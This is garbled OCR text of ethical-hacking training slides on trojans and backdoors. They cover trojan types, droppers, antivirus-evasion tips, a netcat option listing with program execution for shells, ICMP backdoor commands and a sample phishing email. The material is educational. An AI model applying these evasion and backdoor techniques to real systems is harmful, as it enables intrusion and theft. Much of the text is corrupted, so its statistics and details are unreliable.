CEHv8 module 06 trojans and backdoors

Học viện Công Nghệ Thông Tin Bach Khoa Overt and Covert Channels How to Detect Trojans?. Học viện Công Nghệ Thông Tin Bach Khoa It is a program in which the is Contained inside appare

Trang 2

PandaLabs, Panda Security's anti-malware laboratory, stated that, in the first tem months of the

—— 1 year the number of threats created and distributed account for one third of all viruses that exist

These means that 34 percent of all malware ewer created has apoeared in the last ten months

- ear The company’s collective intelligence database, which automatically detects, analyzes and

“This doesn’t mean that

classifies 99.4 percent of the threats received, now has 134 or separate fies, 6O million of there are fewer threats or

whéch are malware (viruses, worms, trojans and other threats]

hrinkine Quite th The report further added that, up to October this year, some 20 million new strains of mahwere

is shrin Quite the : An: = Cương hawe been created (including new threats and variants of existing families), the same amount as in

P : the whole of 2009, The sverage number of new threats created every day hes risen from $5,000

expand, and by the end of 2

to 63,000,

2010 we will have logge:

fim pite these dramatk numbers, the speed with which the number of néw thrésts i growing has

Si Ee : — ropped since 2009 ce 2003, “new thrests have increased at a rate of 100 percent or mere

Sa : Yet so far in 20 10 the: rate of growth & around 50 percent”, explains Luis Corrons, technica

2003 Yet it seems as though

Otrector, Pandalab-

hackers sre applying

le, r The company further informed that, although more malicious softwere Is created, its lifespan ts

shorter: S4 54 percent of malware samples are active for just 24 hours, as opposed to the lifespan of

prioritizi mz the di: ale ition =ễ ve ' se Joyed trự tÍxe † "reats ot previc Ss years Trey NOW infect

just a few systems and

Setect new malware, hackers modify them

v new ones so as to evade detection This is why it & so important tc creation new ones”, Corrons tt to Mave protection

4 technologies such as collective intelligence, w hich can rapkily neutralize new malwere and recuce

Trang 3

Học viện Công Nghệ Thông Tin Bach Khoa

Overt and Covert Channels

How to Detect Trojans?

Purpose of Trojans

Evading Anti-Virus Techniques Indications of a Trojan Attack

Trojan and Backdoor

How to Infect Systems Using a Anti-Trojan Software Trojan?

Trang 4

Infection £ Trojans ” Detection — measures “ \ Software

Trang 5

It is a program in which the is Contained inside apparently harmless

allocation table on your hard disk

would be able to read | and ’ _ and/or on

the screen

infected with Trojan Here is my credit card number and expire date ae

Send me facebook

account information

Victim in London infected with Trojan

Trang 6

Overt Channel

A legitimate communication path

within a computer system, o1

network, for transfer of data

Example of overt channel

includes games or any legitimate

A channel that transfers information within a computer

system, of network, ina Wway that

violates the security policy The simplest form of covert channel! is a Trojan

Trojịan.exe (Keylogger Steals Passwords)

Trang 7

Delete or replace Generate fake

Operating System's traffic to create critical files DOS attacks

Trang 8

X Credit card information

AS) Account data (email addresses, passwords, user names, etc.)

other machines on the network or Internet

TT -

Trang 9

ca eee Pee eee eee ee ee eee eee : eee eR HO eee eee ee eee ee ` Toe eee eee eee ~ eee eee eee ee eee ee ee eee ee ee

¿ ` Xe onvictims : : - aera ice button disa ars : :

Hee Reob»eoseso&sseœeene=seeseeseseee toeeeeeesseseeeeesseeeseeeesed Eeeesooeeseseouqeeonoeoouseee

: Screensaver”s : : Strange purchase x , : settings change : : statements appear in cx

: automatically : : the credit card bills

+ °eeeeeseesseeeseasseeeeeeees : ssee6eeseeeeeeeeeeeeseseseeee §eeeeeee See6e6seeeesee°eeeesese teeeeeeeeeeeeeseseeeseesesee

background settings : > personalinformation ; change : : about avictim :

Trang 10

~ ae

2330 - 2338

Trang 11

Trojan » Types of Trojan «4 Counter- 4 Anti-Trojan

Infection \” Trojans * Detection J measures “ Software

Penetration ps ‹ _ Testing 4 =

Trang 12

How to Infect Using a ie

Create a dropper, which is a part in a trojanized packet that installs the malicious code

on the target system

Trang 13

Trang 14

When the user runs the wrepped

EXE, it first instalis the The two programs are

Attackers might send a t that will install a Trojan as the user watches, for example, a birthday cake

dancing across the screen

Trang 15

la=~ số q ”==d comenarcts wetunctent ug Core nạ |

Trang 16

ee “

*

Downloading files, games,

and screensavers from ,

Internet sites

Attachments

NetBIOS (FileSharing) Sa sssssess@seS Browser and email

software bugs

Trang 17

` Nope Steve (hevtemes Servive 7

Attacker sends an email

to victim containing link — Vv = to Trojan server 1 lun =)

SS SPSS SESE EEE EE EEC Ot ee ee e-EULUmUmCmCmCOCOOOCOCOCU RO RRO he eee eee eee ee «tl Ẫ

- —— 7 eS

;

Victim clicks the fink ard ree A

Trojan server in Russia Internet "ee

Frojan ts sent to the victim

How to a Trojan? Trojen Server (Russia)

Trang 18

(anti-virus can detect these , ——~ application

easily)

Change the content of the Gan - - se Change Trojan’s syntax:

Trojan using hex editor and » Convert an EXE to VB script

also change the checksum “ > Convert an EXE to a DOC file

and encrypt the file > Convert an EXE toa PPT file

> Convert an EXE toa PDF file

Trang 19

Trojan Types of _ Trojan «5 Counter- « Anti-Trojan

Infection Trojans LÝ Detection “4 measures “ Software

Penetration ¬ =

Testing ` +“ ao

Trang 20

Trang 21

Trojans

Trojan server is installed on the victim's machine, which opens a port for attacker to connect

The client is installed on the attacker's machine, which is used to launch a command shell on the victimˆs machine

Trang 22

listen for inbound: nc -l -p port [options] [hostname] [port]

œptionas :

—& prog inbound program to exec [dangercust!]

—y gateway source-routing bop point[#], up to 8

—~“ source-routing pointer: 4, 8, 12,

-h this oruft

=` delay interval for lines sent, ports scanned

a listen mode, for inbound connects -L listen harder, re-listen om socket close

es) numcric-only IP addresses, no DNS aa] hex dump of traffic

a local port number

-z randomize local and remote ports -s local source address

ah answer TELNET negotiation

aa] UDP mode

verbose [use twice to be sore verbose]

Cimeout for connects and final net reads

at zereo-I/O mode [used for scanning]

port numbers can be individual or ranges: m-n [inclusive]

Trang 25

We have received & package addressed to you af tne value of USD 2.3500 ` —_

The custom duty has not been paki for this siepment witch Is listed as DVerecereerareeereeraw

Please call us at Fedex at 1800-234-446 Ext 345 or e-mail me at ; into s Wore cocument

Ø1 £ob<er1s@1edex com regarding this shipment = and infects victim

7 mM ter

Piease visit our Fedex Package Tracking Website to see more details

about tris stioment and advice us on how fo oroceed The website ink is v

Stlached with Tus tte

Customer Service Heoreseritallve :

inmemnatonal Suipment anc Mandiing

Fedex Allama Division Vỳ

Te! 1800-234-446 Ext 345 & 5

lo ¿2ww xqạcx cạn Trojan is executed as victim opens the

m.robertsmfece Com x document and clicks on Trojan package

Victim's System

Trang 26

Trojans

A `

Attacker uses open relay SMTP server and fakes the email’s FROM field to hide origin

> : a

internet Firewall

Trang 27

Trang 28

view, edit, extract,

and replace strings, bitmaps, logos and icons from ary Windows

Trang 30

Trojans

œ

Botnet Trojans infect a large number of computers across a large geographical

Control (C&C) center

attacks, spamming, click fraud, and the theft of financial information

2

Bot Bot Bot

Botnet C&C Sot soi ot

Trang 31

~~ inctall Kemel Dewees

v¥ Save services state m 1egetry

Cokeed IRC messages

C Docamnerts and Settings AdmrremstadarE scrtono \MIS VIRUS\BOT NE T Vdusion_

Pot 6657 Chan Hhowancyvvu: Pass | 2580

Pot 6667 Chan ‘Broyvanosyvrn ÐĐa-:

Trang 32

‘

Botnet Trojan: NetBot Attacker

— Metis Attarter | 4 Engte® versen

On-line bests AMieck Aree Collective urdrv tlạc hước

*+ỞỠAA4 1213 E5 65 CASA Wiedews’ 10825M8 2087011 -

.*I84%1?0.741 LESCH Wiedewno 7oown #007n11 3

~ 7 rc VWiedewnd' -£u4°w® +*o07013113

: "i88 179.71 #11 vaio Wiedows)d" 12738 '*W07W31 1

=18a 125% 1501L21 MOMEHL WVt«4ewwx27! L ` ` ->u070113

| SP 222.226.2397 t®aiz Wiedewnd' #SBMtt +00703113

'¡“!#ff-.?% 176.711 SAN Wedews? 1074ME 200703113

¡ =i198.31.129.42 HASTA Wd@sdews2Ø! #b0Mtd #00701113

988.148.268.225 MADLI Wihedews?* 44umo #007011 13

| ~*/190 198.24E 113% BLA U,._ , 20070313 “I4 12b z4% táu CO4 O5%D Vwwvte4dơwro>»Øf! vhimMe '#u0703113

|

;

` ? ` ` ; 5 `

Trang 33

Trojans

Trojan Proxy is usually a standalone application that allows remote

victim’s computer Thousands of machines on the Internet are infected with proxy servers using this technique

Trang 34

” EiIKAC2zAE2

Proxy Server Trojan:

WS3bPrOxy Tr0j]4nCr34t0r (Tunny Narne)

W3bPrOxy TrOján is a proxy server Trojan which support multi connection from many clients

and report IP and ports to mail of the Trojan owner

Trang 35

Trojans

download any files that exist on the victim's computer

ile as

c: \creditcard txt file ee ee ee Oe be) ee hs

96/07/7010 1,074 Sat) O3/O06/2010 0 abc tzt 94/24/2010 <UIH> AđventNWNe+

SS/21/27010 0 AUTUNXEC SAT O5/73/2010 0 CONFIG SYS

06/04/2010 <DIR> Data {tTP Server installed in 94/119/2910 <DIR> Deocusente and

Trang 36

ControlPort: 21 BindPort: 55555 UserName: test Password: test

HomeDir: c: \win98

Allowd IP: all Local Address: 192.168.168.116 ReadAccess: Yes

WriteAccess- Yes LIistAccess: Yes CreateAcoess - Yes DeleteAccess: Yes ExecuteAccess: Yes UnlockAccess: No AnonymousAccess: NO Check Time Out Thread Created Successfully

0 Connection Is In Use

Trang 37

Since VNC program is considered a utility, this

Trojan will never be detected by anti virus

Trang 38

Trang 39

Trang 40

with the location of an IP addres

S sere cv ước Xem cớ» KG ohders \ meal wy

Trang 41

infect the victim’s computer with

i should be running in the background listening on

CR ee ee Me gee Tet Ee ee es ees see

Trang 42

Trang 43

Commands are sent using ICMP protocol

—ẰẶ ẰẮ Ăn nh han < 22/1 Q1 Hackdđoor YVCi32>Iicmeœ 21242200 L( 0Á 2) (0612.22.42 ae

SE iompsry -install <fo install scrvice>

lompstv —remove <to remove service>

Trang 44

This Trojan works like a remote desktop access Hacker gains

compiete GU! access to the remote system

Trang 46

Trang 47

Covert Channel Trojan:

£

F

access control system

2 it enables attackers to get an exts | hell from within the internal network and

vice-versa

3 it sets a TCP/UDP/HTTP CONNECT ST allowing TCP data streams (SSH, SMTP,

POP, etc ) between an external server and a box from within the internal network

Tee PC ER CRC CK eC CC CCC RP CK PC %6 eC eC PC ee eC eC eee ee eee ee ee]!

Encoded dots through TCP/UDP :

Client CCTT Firewall Target

Services

Trang 48

E-banking Trojans

e-banking Trojans intercept a victim's account information before it is encrypted and send it to

the attacker's Trojan command and control center

Malicgous advertisements published

arrxong the legytirmmate websites

User access to infected

EE ERTS Cortrol and

<Áđsssossseoeosevoeneeoobvooooeẻ Command Server

Định dạng
Số trang	98
Dung lượng	4,53 MB